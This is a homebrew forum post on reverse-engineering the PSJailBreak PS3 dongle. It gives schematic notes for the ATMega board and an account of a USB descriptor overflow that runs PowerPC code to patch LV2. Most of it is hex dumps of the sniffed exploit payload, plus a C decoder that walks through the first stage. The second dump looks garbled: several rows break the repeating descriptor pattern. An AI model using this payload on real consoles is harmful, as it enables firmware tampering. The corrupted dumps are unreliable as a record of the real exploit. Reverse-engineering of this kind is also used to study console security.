Forum index: The homebrew corner » Development


Help us reverse-engineer the PSJailBreak

Hello. A member of GX-Mod has recently obtained an excellent schematic. To try to reproduce the PSJailBreak schematically, we will need your help and whatever information you have on the PSJailBreak. That member is Xantra, and another member, Neme6 of Logic-Sunrise, also has one.

Here is the information we already have:

PSJailBreak:
Possible procedure for dumping (extracting) the PSJailBreak firmware:
PSJailBreak schematic:
ATMega164P/324P/644P… microcontroller of the PSJailBreak (Neme6):
Front of the PSJailBreak (Neme6):

Components (red dots):

A: Resistor; 1 kΩ
B: LED
C: LED
D: Resistor; 1 kΩ
E: Resistor
F: Capacitor
G: Resistor
H: Resistor; 1 kΩ (pull resistor)
I: Capacitor
J: Capacitor; 100 nF (decoupling capacitor)
K: Crystal (quartz)

In green: the pins that are connected.
In blue: the pins that are probably connected.

Also, the AVR application note on software (bit-banged) USB could explain (see p. 6) the presence of the C and R on USB D+ and USB D-. XD

Edit: I made a mistake on the schematic; the connections to pins 10 and 11 must be shifted to pins 9 and 10 (RX, TX).
The orange point C may be connected to pin 11 (for INT0 instead of INT1).

We should add a pair of Zener diodes to protect the USB port (D+/D- run at 3.3 V!), or else run the microcontroller at a reduced supply voltage.

Furthermore, D- should be pulled up (to Vcc) rather than down (to GND): a low-speed USB device announces itself to the host with a 1.5 kΩ pull-up on D-, and a pull-down would never enumerate. And never put a capacitor on the data lines!

Back of the PSJailBreak (Neme6):
General schematic of the PSJailBreak (Xantra):
PCB layout (typon) (Xantra):

General schematic of the PSJailBreak (Xantra) and PCB layout (Xantra) in KiCad.

GameFreax wrote:
We extracted the PSJailBreak dongle in order to study it more precisely. We will briefly explain here the main steps of the PSJailBreak's internal process.
We can confirm that what we had in hand is the PSJailbreak, and not a clone of Sony's "Jig". PSJailbreak really is an exploit in itself. The chip is not a PIC18F444 but an ATMega with software USB. This means the chip is able to emulate devices from the inside over USB. The PSJailBreak mainly behaves like a 6-port USB hub on which 6 devices are connected and disconnected again. One of these devices carries the ID of Sony's "Jig" module, which means that the development of the PSJailBreak "Jig" module played a certain role.
But let's start with this: when the PS3 is switched on, the USB emulation allows a USB device to be recognized, which lets it be given a fairly large configuration descriptor. That descriptor then overflows the memory stack (process management in the PS3) with a piece of PowerPC code, which is itself executed! A device is brought up with this large (0xAD) descriptor, which is part of the exploit and contains static data. A little later (we are talking a few milliseconds) the JIG module is connected, and encrypted data is transmitted to the JIG module. An eternity (in milliseconds) later, the JIG module responds with 64 bytes of static data, all USB devices are disconnected, a new USB device is connected, and the PS3 boots with the previously emulated static data, organized as in the image below.
Some dumps of the PSJailBreak by Fidillo:
"Sniffed" shellcode of the PSJailBreak

Descrambler, a member of PS3Hax, "sniffed" the shellcode contained in the PSJailBreak. Apparently the shellcode repeats 32 times and patches LV2.

The first eight bytes at the left [09 02 …] come from the USB protocol: they are the configuration descriptor header (bLength 0x09, bDescriptorType 0x02 = CONFIGURATION, wTotalLength as a little-endian 16-bit value, bNumInterfaces, bConfigurationValue, iConfiguration, bmAttributes). Note that this header claims a wTotalLength of 0x0012 bytes while the dump that follows is 0xF00 bytes long.

This code is sent four times to the PS3's USB stack:

Code:
09 02 12 00 01 00 00 80 FA 09 04 00 00 00 FE 01
02 00 00 00 00 00 00 00 FA CE B0 03 AA BB CC DD
38 63 F0 00 38 A0 10 00 38 80 00 01 78 84 F8 06
64 84 00 70 38 A5 FF F8 7C C3 28 2A 7C C4 29 2A
28 25 00 00 40 82 FF F0 38 84 00 80 7C 89 03 A6
4E 80 04 20 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
7C 08 02 A6 F8 21 FF 61 FB 61 00 78 FB 81 00 80
FB A1 00 88 FB C1 00 90 FB E1 00 98 F8 01 00 B0
3B E0 00 01 7B FF F8 06 7F E3 FB 78 64 63 00 05
60 63 0B 3C 7F E4 FB 78 64 84 00 70 60 84 01 AC
38 A0 04 FA 4B 97 BF 59 7F E3 FB 78 64 63 00 05
60 63 0B 3C 38 63 00 20 4B 9D 22 01 7F E3 FB 78
64 63 00 05 60 63 0B 3C 7F E4 FB 78 64 84 00 2E
60 84 B1 28 38 63 00 10 F8 64 01 20 7F E5 FB 78
64 A5 00 70 60 A5 01 50 80 65 00 00 28 03 00 00
41 82 00 18 80 85 00 04 7C 63 FA 14 90 83 00 00
38 A5 00 08 4B FF FF E4 48 00 05 88 F8 21 FF 51
7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
F8 01 00 C0 3B C0 07 D0 3B E0 00 C8 4B 90 A9 B8
00 04 90 E0 E8 82 0F 08 00 04 90 E4 E8 7C 00 20
00 04 90 E8 F8 64 00 00 00 04 F0 A8 48 00 1A 9D
00 2A AF C8 4B DA 5B 80 00 04 ED 18 38 80 00 00
00 04 ED 1C 90 83 00 00 00 04 ED 20 4E 80 00 20
00 3B A8 90 01 00 00 00 00 05 05 D0 38 60 00 01
00 05 05 D4 4E 80 00 20 00 00 00 00 38 60 00 01
4E 80 00 20 48 00 02 78 48 00 01 EC 80 00 00 00
00 05 0C A8 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 10 32 80 00 00 00 00 05 0B 7C 80 00 00 00
00 05 0B 8C 80 00 00 00 00 05 0B 9C 80 00 00 00
00 05 0B D4 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 1C 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 78 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 84 80 00 00 00 00 33 E7 20 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 F8 21 FF 81 7C 08 02 A6 F8 01 00 90
38 80 00 00 38 A0 00 01 48 08 1D B1 80 A3 00 08
38 60 00 00 3C 80 AA AA 60 84 C0 DE 7C 04 28 40
41 82 00 08 38 60 FF FF 7C 63 07 B4 E8 01 00 90
7C 08 03 A6 38 21 00 80 4E 80 00 20 F8 21 FF 81
7C 08 02 A6 F8 01 00 90 38 80 00 00 48 08 1D 99
38 81 00 70 38 A0 00 00 F8 A4 00 00 38 C0 21 AA
B0 C4 00 00 38 C0 00 00 B0 C4 00 06 38 C0 00 01
78 C6 F8 06 64 C6 00 05 60 C6 0B AC 38 E0 00 00
48 08 1C CD 38 60 00 00 E8 01 00 90 7C 08 03 A6
38 21 00 80 4E 80 00 20 38 60 00 00 39 60 00 FF
44 00 00 22 2C 03 00 00 40 82 00 1C 38 60 00 01
78 63 F8 06 64 63 00 05 60 63 0B BC 38 80 00 01
90 83 00 10 4E 80 00 20 F8 21 FF 31 7C 08 02 A6
F8 01 00 E0 FB E1 00 C8 38 81 00 70 48 16 2E 81
3B E0 00 01 7B FF F8 06 67 FF 00 05 63 FF 0B BC
E8 7F 00 00 2C 23 00 00 41 82 00 0C 38 80 00 27
48 01 17 E9 38 80 00 27 38 60 08 00 48 01 13 9D
F8 7F 00 00 E8 81 00 70 4B FF C5 F9 E8 61 00 70
38 80 00 27 48 01 17 C5 E8 7F 00 00 4B FF C6 0D
E8 9F 00 00 7C 64 1A 14 F8 7F 00 08 38 60 00 00
EB E1 00 C8 E8 01 00 E0 38 21 00 D0 7C 08 03 A6
4E 80 00 20 F8 21 FF 61 7C 08 02 A6 FB 81 00 80
FB A1 00 88 FB E1 00 98 FB 41 00 70 FB 61 00 78
F8 01 00 B0 7C 9C 23 78 7C 7D 1B 78 3B E0 00 01
7B FF F8 06 7F A3 EB 78 7F E4 FB 78 64 84 00 05
60 84 10 28 38 A0 00 09 4B FF C5 CD 28 23 00 00
40 82 00 34 67 FF 00 05 63 FF 0B BC 80 7F 00 10
28 03 00 00 41 82 00 20 E8 7F 00 00 28 23 00 00
41 82 00 14 E8 7F 00 08 38 9D 00 09 4B FF C5 45
EB BF 00 00 7F A3 EB 78 48 25 A2 38 7C 08 02 A6
F8 21 FE 61 FB 61 00 78 FB 81 00 80 FB A1 00 88
FB C1 00 90 FB E1 00 98 F8 01 01 B0 7C 7D 1B 78
7C 9E 23 78 3B E0 00 01 7B FF F8 06 EB 82 96 00
EB 9C 00 68 EB 9C 00 18 EB 62 0F 08 E9 3D 00 18
81 29 00 30 79 29 84 02 2C 09 00 29 40 82 00 58
E8 9C 00 10 78 85 C1 E4 78 A5 46 20 2C 05 00 FF
41 82 00 18 60 84 00 03 F8 9C 00 10 38 60 00 06
90 7E 00 00 48 00 00 14 60 84 00 02 F8 9C 00 10
38 60 00 2C 90 7E 00 00 80 BC 00 04 E8 9C 00 08
E8 7B 00 00 7D 23 2A 14 F9 3B 00 00 48 02 B1 C1
48 00 00 C4 7F A3 EB 78 7F C4 F3 78 4B FF D9 B1
7F FD FB 78 67 BD 00 05 63 BD 0B D0 80 7D 00 00
80 BC 00 04 7C 63 2A 14 90 7D 00 00 E8 9C 00 10
78 85 C1 E4 78 A5 46 20 2C 05 00 FF 40 82 00 88
E8 7B 00 00 38 80 00 00 38 C0 00 00 7C E3 22 14
80 A7 00 00 7C C6 2A 78 38 84 00 04 28 24 04 00
40 82 FF EC 80 7D 00 00 78 C6 07 C6 7C C6 1B 78
38 60 00 00 90 7D 00 00 7F E7 FB 78 64 E7 00 05
60 E7 0F 70 E8 67 00 00 28 23 00 00 41 82 00 38
38 E7 00 10 7C 23 30 40 40 82 FF EC E8 A7 FF F8
E8 FB 00 00 80 65 00 00 28 03 00 00 41 82 00 18
80 85 00 04 7C 63 3A 14 90 83 00 00 38 A5 00 08
4B FF FF E4 38 60 00 00 EB 61 00 78 EB 81 00 80
EB A1 00 88 EB C1 00 90 EB E1 00 98 E8 01 01 B0
38 21 01 A0 7C 08 03 A6 4E 80 00 20 F8 21 FF 51
7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
F8 01 00 C0 3B C0 0F A0 3B E0 00 C8 4B FB 9B 98
A0 55 6F 3D 00 2C B8 FD 80 00 00 00 00 05 0F B8
8C 0A 94 8C 00 0D 99 B1 80 00 00 00 00 05 0F E0
A2 BC 1A 56 00 05 2A DC 80 00 00 00 00 05 10 04
6B 70 28 02 00 02 00 17 80 00 00 00 00 05 0F D4
00 00 00 00 00 00 00 00 00 30 53 54 38 60 00 82
00 5F 3F C0 38 60 00 01 00 5F 3F C4 4E 80 00 20
00 00 00 00 00 02 ED 0C 3B A0 00 01 00 00 00 00
00 22 B8 88 5F 74 6F 6F 00 22 B8 8C 6C 32 2E 78
00 22 B8 90 6D 6C 23 72 00 22 B8 94 6F 6F 74 00
00 00 00 00 00 0D 68 B8 5F 74 6F 6F 00 0D 68 BC
6C 32 2E 78 00 0D 68 C0 6D 6C 23 72 00 0D 68 C4
6F 6F 74 00 00 00 00 00 2F 64 65 76 5F 62 64 76
64 00 6D 6F 64 00 00 00 00 00 00 00 00 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
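The PowerPC code in the dump starts at offset 0x20, right after the FA CE B0 03 AA BB CC DD marker. The following is an added example, written for this page and not part of the sniffed data or of anyone's PSJailBreak firmware: a minimal C decoder for the handful of PowerPC instruction forms that the first 13 instructions use, applied to those bytes copied verbatim from the dump above. It handles only those forms (D-form addi/oris/ori/cmpli, bc, bcctr/bclr, MD-form rldicl/rldicr, X-form ldx/stdx/mtspr/mfspr); anything else is printed as `.long`.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 13 instructions at offsets 0x20..0x53 of the first dump above, copied
   verbatim; everything before them is USB descriptor data plus the
   FA CE B0 03 AA BB CC DD marker. */
static const uint8_t stage1[52] = {
    0x38,0x63,0xF0,0x00, 0x38,0xA0,0x10,0x00, 0x38,0x80,0x00,0x01, 0x78,0x84,0xF8,0x06,
    0x64,0x84,0x00,0x70, 0x38,0xA5,0xFF,0xF8, 0x7C,0xC3,0x28,0x2A, 0x7C,0xC4,0x29,0x2A,
    0x28,0x25,0x00,0x00, 0x40,0x82,0xFF,0xF0, 0x38,0x84,0x00,0x80, 0x7C,0x89,0x03,0xA6,
    0x4E,0x80,0x04,0x20
};

static uint32_t be32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

static void simm_str(int32_t v, char *out, size_t n)
{
    snprintf(out, n, "%s0x%x", v < 0 ? "-" : "", (unsigned)(v < 0 ? -v : v));
}

/* Decode one big-endian PowerPC instruction. Only the forms this loader
   uses are recognized; returns 1 for a known mnemonic, 0 for ".long". */
int ppc_disasm(uint32_t insn, char *out, size_t n)
{
    uint32_t op = insn >> 26, rd = (insn >> 21) & 31, ra = (insn >> 16) & 31,
             rb = (insn >> 11) & 31, xo = (insn >> 1) & 0x3ff, uimm = insn & 0xffff;
    int32_t simm = (int16_t)(insn & 0xffff);
    char imm[16];

    switch (op) {
    case 14:                                   /* D-form addi; rA=0 is "li" */
        simm_str(simm, imm, sizeof imm);
        if (ra == 0) snprintf(out, n, "li r%u,%s", rd, imm);
        else         snprintf(out, n, "addi r%u,r%u,%s", rd, ra, imm);
        return 1;
    case 24:                                   /* ori; ori r0,r0,0 is the nop */
        if (insn == 0x60000000) snprintf(out, n, "nop");
        else snprintf(out, n, "ori r%u,r%u,0x%x", ra, rd, uimm);
        return 1;
    case 25:                                   /* oris rA,rS,uimm */
        snprintf(out, n, "oris r%u,r%u,0x%x", ra, rd, uimm);
        return 1;
    case 10: {                                 /* cmpli; L bit set = 64-bit compare */
        uint32_t crf = rd >> 2;
        const char *m = (insn >> 21) & 1 ? "cmpldi" : "cmplwi";
        if (crf) snprintf(out, n, "%s cr%u,r%u,0x%x", m, crf, ra, uimm);
        else     snprintf(out, n, "%s r%u,0x%x", m, ra, uimm);
        return 1;
    }
    case 16: {                                 /* bc: BO=4,BI=2 is bne; BO=12,BI=2 is beq */
        int32_t bd = (int16_t)(insn & 0xfffc);
        simm_str(bd, imm, sizeof imm);
        if (rd == 4 && ra == 2)       snprintf(out, n, "bne %s", imm);
        else if (rd == 12 && ra == 2) snprintf(out, n, "beq %s", imm);
        else snprintf(out, n, "bc %u,%u,%s", rd, ra, imm);
        return 1;
    }
    case 19:                                   /* XL-form branches through CTR / LR */
        if (xo == 528 && rd == 20) { snprintf(out, n, "bctr"); return 1; }
        if (xo == 16  && rd == 20) { snprintf(out, n, "blr");  return 1; }
        break;
    case 30: {                                 /* MD-form rotates: rldicl / rldicr */
        uint32_t sh = ((insn >> 1) & 1) << 5 | rb;     /* sh5 : sh0-4 */
        uint32_t mf = (insn >> 5) & 0x3f;
        uint32_t me = (mf & 1) << 5 | (mf >> 1);       /* split 6-bit mask field */
        uint32_t mdxo = (insn >> 2) & 7;
        if (mdxo == 0) { snprintf(out, n, "rldicl r%u,r%u,%u,%u", ra, rd, sh, me); return 1; }
        if (mdxo == 1) { snprintf(out, n, "rldicr r%u,r%u,%u,%u", ra, rd, sh, me); return 1; }
        break;
    }
    case 31:                                   /* X-form loads/stores and SPR moves */
        if (xo == 21)  { snprintf(out, n, "ldx r%u,r%u,r%u", rd, ra, rb);  return 1; }
        if (xo == 149) { snprintf(out, n, "stdx r%u,r%u,r%u", rd, ra, rb); return 1; }
        if (xo == 467 || xo == 339) {
            uint32_t spr = (insn >> 11) & 0x3ff;
            spr = (spr & 0x1f) << 5 | spr >> 5;        /* the two 5-bit halves are swapped */
            const char *name = spr == 8 ? "lr" : spr == 9 ? "ctr" : NULL;
            if (name) { snprintf(out, n, "%s%s r%u", xo == 467 ? "mt" : "mf", name, rd); return 1; }
        }
        break;
    }
    snprintf(out, n, ".long 0x%08x", insn);
    return 0;
}

/* Text of instruction i of the loader, from a static buffer (not reentrant). */
const char *stage1_text(size_t i)
{
    static char buf[48];
    if (i >= sizeof stage1 / 4) return "?";
    ppc_disasm(be32(stage1 + 4 * i), buf, sizeof buf);
    return buf;
}

int main(void)
{
    for (size_t i = 0; i < sizeof stage1 / 4; i++)
        printf("%04zx: %08x  %s\n", (size_t)0x20 + 4 * i, be32(stage1 + 4 * i), stage1_text(i));
    return 0;
}
```

Compiled with any C99 compiler and run, the listing shows what this first stage does: r4 is built up to 0x8000000000700000 (li r4,1; rldicr r4,r4,63,0 puts that 1 in the top bit; oris r4,r4,0x70), r5 counts down from 0x1000 in steps of 8 while ldx/stdx move eight bytes at a time from r3-0x1000 to r4, and the stage ends with addi r4,r4,0x80; mtctr r4; bctr. In other words, it copies the 0x1000 bytes just below the address it was entered with in r3 to a fixed high address and jumps 0x80 bytes into the copy. The function prologues, epilogues and `4B …` branch-and-link instructions that follow in the dump are the next stage, which this decoder deliberately does not cover.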

After that, this code is sent twice, by plugging and unplugging on the USB bus. Apart from its 9-byte configuration header (09 02 4D 0A 01 01 00 80 01, i.e. wTotalLength 0x0A4D) it consists of one and the same 9-byte interface descriptor, 09 04 00 00 00 FE 01 02 00, repeated over and over:

Code:
09 02 4D 0A 01 01 00 80 01 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
